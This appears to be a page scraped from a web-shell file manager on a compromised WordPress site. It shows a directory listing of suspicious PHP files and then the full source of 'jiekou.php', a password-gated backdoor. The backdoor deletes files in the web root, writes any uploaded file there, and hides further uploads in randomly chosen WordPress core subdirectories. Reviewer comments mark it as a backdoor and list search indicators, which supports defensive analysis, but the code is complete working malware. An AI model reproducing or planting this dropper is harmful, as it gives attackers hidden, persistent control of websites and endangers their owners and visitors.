at path:
ROOT
/
jiekou.php
run:
R
W
Run
.well-known
DIR
2026-04-09 04:12:40
R
W
Run
4b1f5
DIR
2026-04-14 12:12:42
R
W
Run
cgi-bin
DIR
2026-04-09 04:12:40
R
W
Run
conexion
DIR
2026-04-09 04:12:40
R
W
Run
cpanel_official
DIR
2026-01-27 15:21:11
R
W
Run
f7f55a
DIR
2026-04-13 09:26:23
R
W
Run
fced7b
DIR
2026-04-13 09:26:23
R
W
Run
megamenu
DIR
2026-04-09 04:12:40
R
W
Run
sistema
DIR
2026-04-09 14:06:28
R
W
Run
vendors
DIR
2026-04-09 04:12:40
R
W
Run
wp-content
DIR
2026-04-13 09:26:23
R
W
Run
wp-includes
DIR
2026-04-13 08:51:37
R
W
Run
.ftpquota
15 By
2026-04-10 09:09:22
R
W
Run
Delete
Rename
.htaccess
236 By
2024-02-08 09:26:23
R
W
Run
Delete
Rename
1.txt
6 By
2026-01-22 06:13:24
R
W
Run
Delete
Rename
chmod 1.php
103 By
2026-04-09 04:12:40
R
W
Run
Delete
Rename
error_log
8.52 MB
2026-04-21 11:18:04
R
W
Run
Delete
Rename
events_template.php
1023 By
2026-03-17 20:02:19
R
W
Run
Delete
Rename
google256836def29820fd.html
53 By
2026-04-14 02:15:43
R
W
Run
Delete
Rename
index.php0
12.86 KB
2024-01-31 09:26:22
R
W
Run
Delete
Rename
jiekou.php
8.08 KB
2026-04-07 06:32:09
R
W
Run
Delete
Rename
products.php
9.99 KB
2026-04-07 06:28:47
R
W
Run
Delete
Rename
random_user 1.php
644 By
2026-04-07 06:33:06
R
W
Run
Delete
Rename
robots.txt
361 By
2023-09-21 09:26:23
R
W
Run
savep.php
215 By
2026-03-09 03:43:55
R
W
Run
Delete
Rename
simple.php
15.05 KB
2026-01-28 09:33:28
R
W
Run
Delete
Rename
test.php
737 By
2025-11-10 20:49:14
R
W
Run
Delete
Rename
unzip.php
0 By
2025-11-10 20:49:18
R
W
Run
Delete
Rename
user 1.php
539 By
2026-04-07 06:33:03
R
W
Run
Delete
Rename
waxamailer.php
72.62 KB
2026-02-04 21:44:23
R
W
Run
Delete
Rename
wp-config.php
0 By
2025-11-10 06:26:54
R
W
Run
Delete
Rename
wp-settings.php
0 By
2025-11-10 06:26:54
R
W
Run
Delete
Rename
zo.php
77.49 KB
2026-04-07 06:46:06
R
W
Run
Delete
Rename
error_log
jiekou.php
<?php
// Reviewer annotations (code tokens unchanged, only line breaks and comments added).
//
// This script is a key-gated remote file-management endpoint. Over POST it can
// (1) confirm the shared key, (2) delete regular files in the document root,
// (3) write an uploaded file into the document root, and (4) write an uploaded
// file into a randomly chosen subdirectory of wp-admin / wp-content / wp-includes.
// Nothing in this file restricts the uploaded file's name or type, so on a host
// where it is not an expected application component it should be handled as a
// backdoor/dropper. The hard-coded MD5 value, the module names and the Chinese
// status strings below are stable strings to search file systems and logs for.

// Error reporting is turned off and the request keeps running after the client
// disconnects.
error_reporting(0);
ignore_user_abort(true);
header('Content-Type: application/json; charset=utf-8');
// $dir is assigned here but not read again by the top-level code in this file.
$dir = dirname(__FILE__);
// Every file operation below is rooted at the resolved DOCUMENT_ROOT.
$root_path = isset($_SERVER['DOCUMENT_ROOT']) ? realpath($_SERVER['DOCUMENT_ROOT']) : false;

// Only POST is served; any other method gets an empty 405.
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    http_response_code(405);
    exit;
}

// Key-check probe: a form field test=123 with the right key returns the literal
// text 'success' and does nothing else.
if (isset($_POST['test']) && $_POST['test'] === '123') {
    // The only credential is a value whose unsalted MD5 equals this constant.
    if (md5((string)($_POST['key'] ?? '')) !== '9a286406c252a3d14218228974e1f567') {
        http_response_code(401);
        exit;
    }
    echo 'success';
    exit;
}

// Two request encodings are accepted: multipart form data (fields from $_POST,
// upload from $_FILES['files']) or a JSON document in the raw body.
$is_multipart = isset($_SERVER['CONTENT_TYPE']) && strpos($_SERVER['CONTENT_TYPE'], 'multipart/form-data') !== false;
if ($is_multipart) {
    $data = $_POST;
    $data['_files'] = isset($_FILES['files']) ? $_FILES['files'] : [];
} else {
    $input = file_get_contents('php://input');
    $data = json_decode($input, true);
}

// Same MD5 gate as the probe; an undecodable body or a wrong key yields 401
// with no body.
if ($data === null || md5((string)($data['key'] ?? '')) !== '9a286406c252a3d14218228974e1f567') {
    http_response_code(401);
    exit;
}
// A missing module is also answered with 401.
if (empty($data['module'])) {
    http_response_code(401);
    exit;
}
// 402 is used as the signal that DOCUMENT_ROOT was unset or could not be resolved.
if ($root_path === false) {
    http_response_code(402);
    exit;
}

$module = $data['module'];

// Module 'clear_root': deletes files in the document root (see delete_root_files).
if ($module === 'clear_root') {
    // A second, plaintext hard-coded password guards the destructive action.
    $pwd = isset($data['pwd']) ? trim($data['pwd']) : '';
    if ($pwd !== '010203') {
        // Message text translates to "clear error 0".
        echo json_encode(['success' => false, 'message' => '清空错误0']);
        exit;
    }
    // The caller must name at least one file to keep, otherwise nothing is deleted.
    $keep = isset($data['keep']) && is_array($data['keep']) ? $data['keep'] : [];
    if (empty($keep)) {
        // "clear error 1"
        echo json_encode(['success' => false, 'message' => '清空错误1']);
        exit;
    }
    echo delete_root_files($root_path, $keep);
    exit;
}

// Module 'upload': writes the uploaded file directly into the document root
// under the client-supplied name.
if ($module === 'upload') {
    try {
        if (empty($data['_files']['tmp_name'])) {
            // "upload error 0" - no file part in the request
            echo json_encode([['success' => false, 'message' => '上传错误0']]);
            exit;
        }
        $f = get_file_form($data['_files']);
        if ($f === null) {
            // "upload error 1" - not a genuine PHP upload
            echo json_encode([['success' => false, 'message' => '上传错误1']]);
            exit;
        }
        $fn = isset($f['filename']) ? trim($f['filename']) : '';
        if ($fn === '') {
            // "upload error 2" - empty file name
            echo json_encode([['success' => false, 'message' => '上传错误2']]);
            exit;
        }
        $content = isset($f['content']) ? $f['content'] : '';
        // NOTE(review): no extension, MIME or content check happens before the write.
        $result = upload_file($root_path, $fn, $content);
        echo json_encode([$result]);
        exit;
    } catch (Throwable $e) {
        // "upload error 3" - any exception is reduced to a generic failure
        echo json_encode([['success' => false, 'message' => '上传错误3']]);
        exit;
    }
}

// Module 'upload_random': same upload, but the destination is a randomly chosen
// directory under the WordPress core folders (see get_random_folder_path).
if ($module === 'upload_random') {
    if (empty($data['_files']['tmp_name'])) {
        echo json_encode([['success' => false, 'message' => '上传错误0']]);
        exit;
    }
    $f = get_file_form($data['_files']);
    if ($f === null) {
        echo json_encode([['success' => false, 'message' => '上传错误1']]);
        exit;
    }
    echo upload_to_random_folder($root_path, $f['filename'], $f['content']);
    exit;
}

// Fallback for an unrecognised module. The status code is set after the body
// has been echoed, so whether 400 is actually sent depends on output buffering.
echo json_encode(['success' => false, 'message' => 'Unknown module']);
http_response_code(400);
exit;

/**
 * Reads one uploaded file from a $_FILES-style entry.
 *
 * @param array $files Entry with 'name' and 'tmp_name' keys (taken from $_FILES['files'] by the caller).
 * @return array|null  ['filename' => client-supplied name, 'content' => file bytes],
 *                     or null when tmp_name is empty or is not a real PHP upload.
 */
function get_file_form($files) {
    $name = isset($files['name']) ? $files['name'] : '';
    $tmp = isset($files['tmp_name']) ? $files['tmp_name'] : '';
    // is_uploaded_file() is the only validation applied to the upload.
    if ($tmp === '' || !is_uploaded_file($tmp)) {
        return null;
    }
    return [
        'filename' => $name,
        'content' => file_get_contents($tmp),
    ];
}

/**
 * Deletes regular files that sit directly in the document root.
 *
 * Directories are never entered or removed. Spared are: this script itself,
 * any name listed in $keep (compared case-insensitively) and any file named
 * google*.html.
 *
 * @param string $root_path Resolved document root.
 * @param array  $keep      File names to leave in place.
 * @return string JSON: success flag, message, and the list of deleted names.
 */
function delete_root_files($root_path, $keep) {
    $keep_lower = array_map('strtolower', $keep);
    $deleted = [];
    $root = rtrim($root_path, DIRECTORY_SEPARATOR);
    $items = @scandir($root);
    $current_file = realpath(__FILE__);
    if ($items === false) {
        // "clear error 2" - the root could not be listed
        return json_encode(['success' => false, 'message' => '清空错误2']);
    }
    foreach ($items as $item) {
        if ($item === '.' || $item === '..') continue;
        $r_path = $root . DIRECTORY_SEPARATOR . $item;
        $full_path = realpath($r_path);
        // Skips directories and anything realpath() could not resolve.
        if (!is_file($full_path)) continue;
        // The script protects itself from its own cleanup.
        if ($full_path === $current_file) continue;
        if (in_array(strtolower($item), $keep_lower)) continue;
        // NOTE(review): files named like google*.html are always preserved - presumably
        // search-engine site-verification files; confirm against the host's own records.
        if (preg_match('/^google.*\.html$/i', $item)) continue;
        // Failures are suppressed; only successful deletions are reported.
        if (@unlink($full_path)) $deleted[] = $item;
    }
    return json_encode(['success' => true, 'message' => '1', 'deleted' => $deleted]);
}

/**
 * Writes $content to $dir/$filename, creating $dir if needed.
 *
 * @param string $dir      Target directory (trailing separators are stripped).
 * @param string $filename Name appended to $dir without any sanitising in this function.
 * @param string $content  Bytes to write.
 * @return array ['success' => bool, 'message' => string]; on success the message
 *               is the absolute path that was written.
 */
function upload_file($dir, $filename, $content) {
    try{
        $dir = rtrim($dir, DIRECTORY_SEPARATOR . '/\\');
        $full_path = $dir . DIRECTORY_SEPARATOR . $filename;
        if (!is_dir($dir)) {
            // Missing directories are created recursively with mode 0755.
            if (!@mkdir($dir, 0755, true) && !is_dir($dir) ) {
                // "upload failed 1"
                return ['success' => false, 'message' => "上传失败1"];
            }
        }
        // An existing file of the same name is overwritten.
        if (@file_put_contents($full_path, $content) === false) {
            // "upload failed 2"
            return ['success' => false, 'message' => "上传失败2"];
        }
        // The server-side absolute path is disclosed to the caller.
        return ['success' => true, 'message' => $full_path];
    } catch(Throwable $e){
        // "upload failed 0"
        return ['success' => false, 'message' => "上传失败0"];
    }
}

/**
 * Picks a random existing directory below wp-admin, wp-content or wp-includes.
 *
 * Performs a random walk of at most 20 steps, aiming for a stack of 4 to 6
 * path entries (the starting folder counts as the first). Directories whose
 * name contains 'upgrade', 'mu-plugins', 'plugins' or 'themes' are never
 * entered, and a directory that holds a .htaccess file or has no eligible
 * subdirectory is abandoned.
 *
 * @param string $root_path Document root.
 * @return string|null Path relative to the root, using forward slashes, or null
 *                     when none of the three folders exists or the walk never
 *                     left its starting folder.
 */
function get_random_folder_path($root_path) {
    $root_path = rtrim($root_path, DIRECTORY_SEPARATOR);
    $all_roots = [
        $root_path . DIRECTORY_SEPARATOR . 'wp-admin',
        $root_path . DIRECTORY_SEPARATOR . 'wp-content',
        $root_path . DIRECTORY_SEPARATOR . 'wp-includes',
    ];
    $start_roots = array_filter($all_roots, 'is_dir');
    if (empty($start_roots)) return null;
    $exclude_contains = ['upgrade', 'mu-plugins', 'plugins', 'themes'];
    $min_depth = 4;
    $max_depth = 6;
    $target_depth = $min_depth + mt_rand(0, $max_depth - $min_depth);
    // $path_stack records the walk so it can step back one level.
    $path_stack = [];
    $current_path = $start_roots[array_rand($start_roots)];
    $path_stack[] = $current_path;
    for ($i = 0; $i < 20; $i++) {
        if (count($path_stack) >= $target_depth) break;
        $items = @scandir($current_path);
        if ($items === false) break;
        $has_htaccess = false;
        $subdirs = [];
        foreach ($items as $item) {
            if ($item === '.' || $item === '..') continue;
            $full = $current_path . DIRECTORY_SEPARATOR . $item;
            if (is_file($full)) {
                if (strtolower($item) === '.htaccess') $has_htaccess = true;
                continue;
            }
            if (!is_dir($full)) continue;
            $name_lower = strtolower($item);
            $skip = false;
            foreach ($exclude_contains as $sub) {
                if (strpos($name_lower, $sub) !== false) {
                    $skip = true;
                    break;
                }
            }
            if (!$skip) $subdirs[] = $full;
        }
        // NOTE(review): directories carrying their own .htaccess are avoided -
        // presumably because per-directory rules could block the dropped file; the
        // code itself only shows the avoidance, not the reason.
        if ($has_htaccess || empty($subdirs)) {
            if (count($path_stack) > 1) {
                // Step back to the parent and try again from there.
                array_pop($path_stack);
                $current_path = $path_stack[count($path_stack) - 1];
                continue;
            }
            // Already at a starting folder: pick a starting folder again.
            $current_path = $start_roots[array_rand($start_roots)];
            $path_stack = [$current_path];
            continue;
        }
        $next = $subdirs[array_rand($subdirs)];
        $path_stack[] = $next;
        $current_path = $next;
    }
    if (count($path_stack) < 2) return null;
    $abs = $path_stack[count($path_stack) - 1];
    // Convert the absolute path to a root-relative one with forward slashes.
    $rel = str_replace($root_path, '', $abs);
    $rel = str_replace('\\', '/', trim($rel, '/\\'));
    return $rel === '' ? null : $rel;
}

/**
 * Writes an uploaded file into a directory chosen by get_random_folder_path().
 *
 * NOTE(review): the destination is random and is reported only in the HTTP
 * response, so removing this script does not reveal where earlier files were
 * placed; cleanup needs an integrity comparison of the WordPress core
 * directories against known-good copies.
 *
 * @param string $root_path Document root.
 * @param string $filename  Client-supplied file name.
 * @param string $content   File bytes.
 * @return string JSON list with one result: on success the root-relative URL
 *                path and the file name, otherwise the failure from upload_file()
 *                or a 'No random folder found' message.
 */
function upload_to_random_folder($root_path, $filename, $content) {
    $path = get_random_folder_path($root_path);
    if ($path === null) {
        return json_encode([['success' => false, 'message' => 'No random folder found']]);
    }
    // Back to OS-native separators for the file-system write.
    $path = str_replace(['/', '\\'], DIRECTORY_SEPARATOR, trim($path, '/\\'));
    $root_path = rtrim($root_path, DIRECTORY_SEPARATOR . '/\\');
    $dir = $root_path . DIRECTORY_SEPARATOR . $path;
    $result = upload_file($dir, $filename, $content);
    if (!$result['success']) {
        return json_encode([$result]);
    }
    // The caller receives a URL-style path beginning with '/'.
    $path_url = '/' . str_replace('\\', '/', trim($path, '/\\'));
    return json_encode([['success' => true, 'path' => $path_url, 'filename' => $filename]]);
}